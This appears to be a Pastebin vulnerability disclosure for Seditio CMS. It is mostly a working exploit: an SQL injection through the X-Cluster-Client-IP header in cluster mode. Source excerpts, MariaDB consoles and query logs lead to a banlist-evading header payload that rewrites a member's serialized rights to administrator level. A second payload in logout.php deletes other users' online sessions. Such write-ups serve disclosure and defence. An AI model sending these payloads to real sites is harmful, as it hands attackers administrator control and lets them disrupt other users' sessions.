Seditio CMS: SQL injection via the X-Cluster-Client-IP header (cluster mode), leading to privilege escalation

a guest
May 21st, 2013
268
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.26 KB | None | 0 0
Precondition: $cfg['clustermode'] is enabled (the cluster-mode checkbox in the admin panel sets it to true). With it on, the application takes the client IP from a request header instead of the TCP peer address:
  2.  
  3. $usr['ip'] = ($cfg['clustermode']) ? $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'] : $_SERVER['REMOTE_ADDR'] ;
  4.  
The header value is neither validated as an IP address nor escaped before it is used.
  6.  
Result: SQL injection through the X-Cluster-Client-IP header, first reachable in the last-IP update performed on login:
  8.  
  9. sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
  10.  
  11.  
Header sent with the login request:
  13.  
  14. X-CLUSTER-CLIENT-IP: 127.0.0.1' or 1='1
  15.  
Resulting statement as seen on the database server:
  17.  
  18. MariaDB [sed]> UPDATE sed_users SET user_lastip='127.0.0.1' or 1=1 WHERE user_id=1;
/* the injected OR is evaluated as a boolean expression and its result (1) is what gets stored in user_lastip, so the column reflects the truth of an attacker-chosen condition: a blind-injection oracle */
  20. +-------------+-----------+
  21. | user_lastip | user_name |
  22. +-------------+-----------+
  23. | 1 | admin |
  24. +-------------+-----------+
  25. 1 row in set (0.00 sec)
  26.  
  27.  
  28. MariaDB [sed]> select user_lastip,user_name from sed_users;
  29.  
  30. +-------------+-----------+
  31. | user_lastip | user_name |
  32. +-------------+-----------+
  33. | 1 | admin |
  34. +-------------+-----------+
  35. 1 row in set (0.00 sec)
  36.  
Second vector: the stored value is whatever the injected expression evaluates to, so a function result can be written into user_lastip and read back — here the server version string (apparently cut to the column width):
  38.  
  39. MariaDB [sed]> select user_lastip,user_name from sed_users where user_id=1;
  40. +------------------+-----------+
  41. | user_lastip | user_name |
  42. +------------------+-----------+
  43. | 5.5.30-MariaDB-m | admin |
  44. +------------------+-----------+
  45. 1 row in set (0.00 sec)
  46.  
  47.  
  48. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Privilege escalation
  50.  
  51.  
  52. MariaDB [sed]> select * from sed_auth where auth_code='admin';
  53. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  54. | auth_id | auth_groupid | auth_code | auth_option | auth_rights | auth_rights_lock | auth_setbyuserid |
  55. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  56. | 1 | 1 | admin | a | 0 | 255 | 1 |
  57. | 2 | 2 | admin | a | 0 | 255 | 1 |
  58. | 3 | 3 | admin | a | 0 | 255 | 1 |
  59. | 4 | 4 | admin | a | 0 | 255 | 1 |
  60. | 5 | 5 | admin | a | 255 | 255 | 1 |
  61. | 76 | 6 | admin | a | 1 | 0 | 1 |
  62. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  63.  
6 rows in set (0.01 sec) — one auth row per group for the 'admin' code; auth_rights is the bitmask that matters.
  65.  
  66.  
  67. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin';
  68. +--------------+-------------+
  69. | auth_groupid | auth_rights |
  70. +--------------+-------------+
  71. | 1 | 0 |
  72. | 2 | 0 |
  73. | 3 | 0 |
  74. | 4 | 0 |
  75. | 5 | 255 |
  76. | 6 | 1 |
  77. +--------------+-------------+
  78. 6 rows in set (0.20 sec)
  79.  
  80.  
auth_groupid 5 is the administrators group (see sed_groups below);
  82.  
  83.  
its auth_rights value 255 is the full admin-panel right set. Ordinary members (group 4) have 0 for the 'admin' code.
  85.  
  86.  
  87. MariaDB [sed]> select grp_id,grp_alias from sed_groups;
  88. +--------+----------------+
  89. | grp_id | grp_alias |
  90. +--------+----------------+
  91. | 1 | guests |
  92. | 2 | inactive |
  93. | 3 | banned |
  94. | 4 | members |
  95. | 5 | administrators |
  96. | 6 | moderators |
  97. +--------+----------------+
  98. 6 rows in set (0.02 sec)
  99.  
  100.  
A member's user_auth column holds the serialize() output of sed_auth_build():
  102.  
  103. /*
  104. a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  105.  
  106.  
For a member the 'admin' entry is "admin";a:1:{s:1:"a";i:0;} — code admin, option a, rights 0, i.e. no admin-panel access, matching the auth row for group 4:
  110.  
  111.  
  112. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=4;
  113. +--------------+-------------+
  114. | auth_groupid | auth_rights |
  115. +--------------+-------------+
  116. | 4 | 0 |
  117. +--------------+-------------+
  118.  
  119. */
  120.  
// First login after the rights cache was cleared: derive the grid from the
// auth table and queue a user_auth write-back. While user_auth is non-empty
// this branch is skipped, so the stored grid is never re-validated against
// sed_auth; a tampered value persists until something empties the column.
if (empty($row['user_auth']))
{
$usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
$sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
}
  126.  
  127.  
  128.  
The same column for an administrator:
  131.  
  132. /* output result
  133. a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:255;}s:6:"forums";a:2:{i:1;i:255;i:2;i:255;}s:7:"gallery";a:1:{s:1:"a";i:255;}s:5:"index";a:1:{s:1:"a";i:255;}s:7:"message";a:1:{s:1:"a";i:255;}s:4:"page";a:4:{s:8:"articles";i:255;s:4:"news";i:255;s:7:"sample1";i:255;s:7:"sample2";i:255;}s:3:"pfs";a:1:{s:1:"a";i:255;}s:4:"plug";a:13:{s:7:"adminqv";i:255;s:7:"cleaner";i:255;s:7:"contact";i:255;s:14:"massmovetopics";i:255;s:4:"news";i:255;s:11:"passrecover";i:255;s:11:"recentitems";i:255;s:6:"search";i:255;s:10:"skineditor";i:255;s:10:"statistics";i:255;s:8:"syscheck";i:255;s:7:"tinymce";i:255;s:10:"whosonline";i:255;}s:2:"pm";a:1:{s:1:"a";i:255;}s:5:"polls";a:1:{s:1:"a";i:255;}s:7:"ratings";a:1:{s:1:"a";i:255;}s:5:"users";a:1:{s:1:"a";i:255;}}
  134.  
  135.  
  136.  
  137. +++++++++++++++++++++++++++++++++++
For the administrator the 'admin' entry is "admin";a:1:{s:1:"a";i:255;} — code admin, option a, rights 255, matching the auth row for group 5:
  141.  
  142. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=5;
  143. +--------------+-------------+
  144. | auth_groupid | auth_rights |
  145. +--------------+-------------+
  146. | 5 | 255 |
  147. +--------------+-------------+
  148.  
  149.  
  150. */
  151.  
  152.  
  153. =========================================================
  154.  
  155. function sed_auth_build($userid, $maingrp=0)
  156. {
  157. global $db_auth, $db_groups_users;
  158.  
  159. $groups = array();
  160. $authgrid = array();
  161. $tmpgrid = array();
  162.  
  163. if ($userid==0 || $maingrp==0)
  164. {
  165. $groups[] = 1;
  166. }
  167. else
  168. {
  169. $groups[] = $maingrp;
  170. $sql = sed_sql_query("SELECT gru_groupid FROM $db_groups_users WHERE gru_userid='$userid'");
  171.  
  172. while ($row = sed_sql_fetchassoc($sql))
  173. { $groups[] = $row['gru_groupid']; }
  174. }
  175.  
  176. $sql_groups = implode(',', $groups);
  177. $sql = sed_sql_query("SELECT auth_code, auth_option, auth_rights FROM $db_auth WHERE auth_groupid IN (".$sql_groups.") ORDER BY auth_code ASC, auth_option ASC");
  178.  
  179. while ($row = sed_sql_fetchassoc($sql))
  180. { $authgrid[$row['auth_code']][$row['auth_option']] |= $row['auth_rights']; }
  181.  
  182. return($authgrid); }
  183.  
  184. //update priviliges
  185.  
  186.  
  187. $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  188.  
  189.  
How the cached rights are evaluated at runtime:
  191.  
// How the cached rights grid is consumed: the serialized blob stored in
// sed_users.user_auth is unserialized and the integer under ['admin']['a']
// is what the admin-panel check presumably reads. There is no cross-check
// against the auth table, so whatever is stored wins (255 after the
// injection below). NOTE(review): once the blob can be rewritten through the
// user_lastip injection, this is unserialize() on attacker-controlled data;
// whether that is exploitable beyond the rights grid depends on the classes
// loaded, which are not shown here.
$di=unserialize($usr['auth']);
echo $di['admin']['a']; // 255 for an account whose user_auth was tampered with
  194.  
  195.  
Privilege-escalation exploitation
  197.  
First obstacle: the banlist check splits the IP on dots before building its query:
  199.  
  200. $usr['ip']="127.0.0.1'or 1=1--";
  201. $userip = explode('.', $usr['ip']);
  202. $ipmasks = "('".$userip[0].".".$userip[1].".".$userip[2].".".$userip[3]."','".$userip[0].".".$userip[1].".".$userip[2].".*','".$userip[0].".".$userip[1].".*.*','".$userip[0].".*.*.*')";
  203. var_dump($userip);
  204.  
With the payload 127.0.0.1'or 1=1-- as the address, explode('.') yields ["127","0","0","1'or 1=1--"], so the fourth field carries the injection:
  206.  
  207. echo $usrip[3]; //output result
  208.  
The mask list then becomes IN('127.0.0.1'or 1=1--','127.0.0.*',...) — the unbalanced quote makes the banlist query a syntax error, so this payload never gets as far as the UPDATE.
  211.  
The UPDATE statement fares no better with a `)`-based variant:
  213.  
  214. 130516 21:25:52 66 Query UPDATE sed_users SET user_lastlog='1368721491', user_lastip='12.3.44.4.4') or usr_auth='blah' -- -
  215.  
Also a syntax error: the `)` has no matching opening parenthesis inside the UPDATE.
  217.  
  218.  
Workaround: put the payload in a fifth dot-separated field (index 4):
  220.  
$usr['ip']="127.0.0.1.4'or 1=1-- -";
// explode('.') on this gives ["127","0","0","1","4'or 1=1-- -"]: the payload
// lands in index 4, and $ipmasks only reads indices 0-3, so the banlist query
// sees a clean 127.0.0.1 while the raw $usr['ip'] still reaches the UPDATE.
var_dump($usr['ip']); // shows the full string; element [4] of the explode() above is "4'or 1=1-- -"
  223.  
$ipmasks only reads indices 0–3, so index 4 never reaches the banlist query (it passes as a clean 127.0.0.1), while the raw $usr['ip'], payload included, still goes into the UPDATE.
  225.  
Test account 'administrator' is an ordinary member; its cached rights grid before the attack:
  227. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G
  228. *************************** 1. row ***************************
  229. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  230. 1 row in set (0.44 sec)
  231.  
['admin']['a'] is 0 — no admin-panel access. The goal is to rewrite that integer to 255 through the injection.
  234.  
Path taken by the remembered-login code (session or SEDITIO cookie):
  236.  
  237. if ($cfg['authmode']==2 || $cfg['authmode']==3)
  238. { session_start(); }
  239.  
  240. if (isset($_SESSION['rsedition']) && ($cfg['authmode']==2 || $cfg['authmode']==3))
  241. {
  242. $rsedition = $_SESSION['rsedition'];
  243. $rseditiop = $_SESSION['rseditiop'];
  244. $rseditios = $_SESSION['rseditios'];
  245. }
  246. elseif (isset($_COOKIE['SEDITIO']) && ($cfg['authmode']==1 || $cfg['authmode']==3))
  247. {
  248. $u = base64_decode($_COOKIE['SEDITIO']);
  249. $u = explode(':_:',$u);
  250. $rsedition = sed_import($u[0],'D','INT');
  251. $rseditiop = sed_import($u[1],'D','H32');
  252. $rseditios = sed_import($u[2],'D','ALP');
  253. }
  254.  
  255. if ($rsedition>0 && $cfg['authmode']>0)
  256. {
  257. if (mb_strlen($rseditiop)!=32)
  258. { sed_diefatal('Wrong value for the password.'); }
  259.  
  260. if ($cfg['ipcheck'])
  261. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  262. else
  263. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  264.  
  265. if ($row = sed_sql_fetcharray($sql))
  266. {
  267. if ($row['user_maingrp']>3)
  268. {
  269. $usr['id'] = $row['user_id'];
  270. $usr['sessionid'] = ($cfg['authmode']==1) ? md5($row['user_lastvisit']) : session_id();
  271. $usr['name'] = $row['user_name'];
  272. $usr['maingrp'] = $row['user_maingrp'];
  273. $usr['lastvisit'] = $row['user_lastvisit'];
  274. $usr['lastlog'] = $row['user_lastlog'];
  275. $usr['timezone'] = $row['user_timezone'];
  276. $usr['skin'] = ($cfg['forcedefaultskin']) ? $cfg['defaultskin'] : $row['user_skin'];
  277. $usr['lang'] = ($cfg['forcedefaultlang']) ? $cfg['defaultlang'] : $row['user_lang'];
  278. $usr['newpm'] = $row['user_newpm'];
  279. $usr['auth'] = unserialize($row['user_auth']);
  280. $usr['level'] = $sed_groups[$usr['maingrp']]['level'];
  281. $usr['profile'] = $row;
  282.  
  283. if ($usr['lastlog']+$cfg['timedout'] < $sys['now_offset'])
  284. {
  285. $sys['comingback']= TRUE;
  286. $usr['lastvisit'] = $usr['lastlog'];
  287. $sys['sql_update_lastvisit'] = ", user_lastvisit='".$usr['lastvisit']."'";
  288. }
  289.  
  290. if (empty($row['user_auth']))
  291. {
  292. $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  293. $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  294. }
  295.  
  296. // $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  297. }
  298. }
  299. }
  300.  
  301.  
With a session cookie the remembered-login branch runs:

Cookie: PHPSESSID=<session id whose $_SESSION carries rsedition/rseditiop/rseditios>

Only then is the `if ($rsedition>0 && $cfg['authmode']>0)` block below entered:
  307.  
  308. if ($rsedition>0 && $cfg['authmode']>0)
  309. {
  310. if (mb_strlen($rseditiop)!=32)
  311. { sed_diefatal('Wrong value for the password.'); }
  312.  
  313. if ($cfg['ipcheck'])
  314. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  315. else
  316. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  317.  
  318.  
With $cfg['ipcheck']=true in config.php that branch also embeds $usr['ip'] in its SELECT, but the UPDATE-shaped payload does not parse there:
  323.  
// ipcheck variant of the remembered-login lookup. user_id and user_password are
// already constrained by sed_import (INT / H32), so $usr['ip'] is the only value
// interpolated unfiltered; with clustermode on it is the raw X-Cluster-Client-IP
// header. This statement only runs when a remembered login is present
// ($rsedition > 0).
$sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'");
  325.  
Payload (fails in this SELECT):
  327.  
  328. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  329.  
  330.  
Resulting statement:
  332.  
  333. +++++++++++++++++++++++++++++++++++++
SELECT * FROM $db_users WHERE user_id='3' AND user_password='blah' AND user_lastip='127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -'
  335.  
Syntax error: `,user_auth=...` and a second WHERE are UPDATE syntax and do not parse inside a SELECT. This does not matter for the attack: the login-form request carries no remembered-login cookie, so this SELECT never runs and the login UPDATE is the sink that counts.
  337.  
Header sent with the login-form request:
  339. X-CLUSTER-CLIENT-IP: 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  340.  
  341. http://s18.postimg.org/xcjy55mkp/fullquery.png
  342.  
  343.  
With no cookie/session, $rsedition is 0 and the remembered-login block is skipped:

/*
if ($rsedition>0 && $cfg['authmode']>0) // false without a cookie/session: the block and its SELECT are skipped
*/
  349.  
  350.  
MariaDB general log after a login request with the header set (here with a plain test string written into user_auth instead of the replace() payload; the `-- -` comments out the application's own WHERE ... LIMIT 1):
  352.  
  353. 326 Query SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM sed_users WHERE user_password='3e1f0522ece29f7be6f69cd3bfb2d9a8' AND user_name='admin'
  354. 326 Query UPDATE sed_users SET user_lastip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' WHERE user_id='1' LIMIT 1
  355. 326 Query DELETE FROM sed_online WHERE online_userid='-1' AND online_ip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' LIMIT 1
  356. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  357.  
Result after sending the final payload:

Final payload (X-CLUSTER-CLIENT-IP value; the leading 127.0.0.1.4 keeps the banlist mask check happy, the rest rewrites user 3's rights grid):
  361.  
  362. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  363.  
  364. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G*************************** 1. row ***************************
  365. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  366. 1 row in set (0.00 sec)
  367.  
"admin";a:1:{s:1:"a";i:255;}

['admin']['a'] is now 255. replace() swapped i:0 for i:255 inside the serialized string; serialized integers carry no length prefix, so the blob still unserializes cleanly and the application trusts it.
  371.  
The account now has admin-panel access (screenshot):
  373.  
  374. http://s22.postimg.org/whujo6xu9/lol.png
  375.  
  376.  
  377. ==============================================================
  378.  
Second issue: knocking other users offline through logout.php
  380.  
  381. MariaDB [sed]> select online_ip,online_name from sed_online;
  382. +-----------+-------------+
  383. | online_ip | online_name |
  384. +-----------+-------------+
  385. | 127.0.0.1 | admin |
  386. | 128.0.0.2 | user |
  387. +-----------+-------------+
  388. 2 row in set (0.00 sec)
  389.  
Logged in as the low-privileged account 'user'.
  391.  
Header sent with the logout.php request, spoofing the administrator's address. No injection is needed here: a syntactically valid IP suffices, because the DELETE below keys on online_ip alone.

X-CLUSTER-CLIENT-IP: 127.0.0.1
  395.  
  396. if ($usr['id']>0)
  397. {
  398. $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='".$usr['ip']."'");
  399. sed_redirect("message.php?msg=".$usr['ip']);
  400. exit;
  401. }
  402.  
The same sink is also injectable, e.g. with $usr['ip'] = 127.0.0.1222233' or online_name='admin' (a spoofed header value instead of the administrator's real IP):
  404.  
Executed statement: sed_sql_query("DELETE FROM $db_online WHERE online_ip='127.0.0.1222233' or online_name='admin'");
  406.  
Effect: the administrator's sed_online row is removed by an unprivileged user.
  408.  
  409.  
  410. my favorit :) http://www.youtube.com/watch?v=ruFt9ZvBnvo